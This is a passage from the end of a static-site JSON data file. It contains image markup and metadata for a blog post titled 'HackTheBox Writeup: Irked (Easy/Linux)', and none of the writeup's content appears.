240w,\n/static/93a32e641e2dc216a3d1bad21d163c78/e85cb/image-20220806113215646.png 480w,\n/static/93a32e641e2dc216a3d1bad21d163c78/59000/image-20220806113215646.png 917w\"\n            sizes=\"(max-width: 917px) 100vw, 917px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            
src=\"/static/93a32e641e2dc216a3d1bad21d163c78/59000/image-20220806113215646.png\"\n            alt=\"image-20220806113215646\"\n            title=\"image-20220806113215646\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>","fields":{"slug":"/hackthebox-linux-irked-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-08-04","description":"A writeup of the retired HackTheBox machine 'Irked'.","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Irked (Easy/Linux)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-linux-irked-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}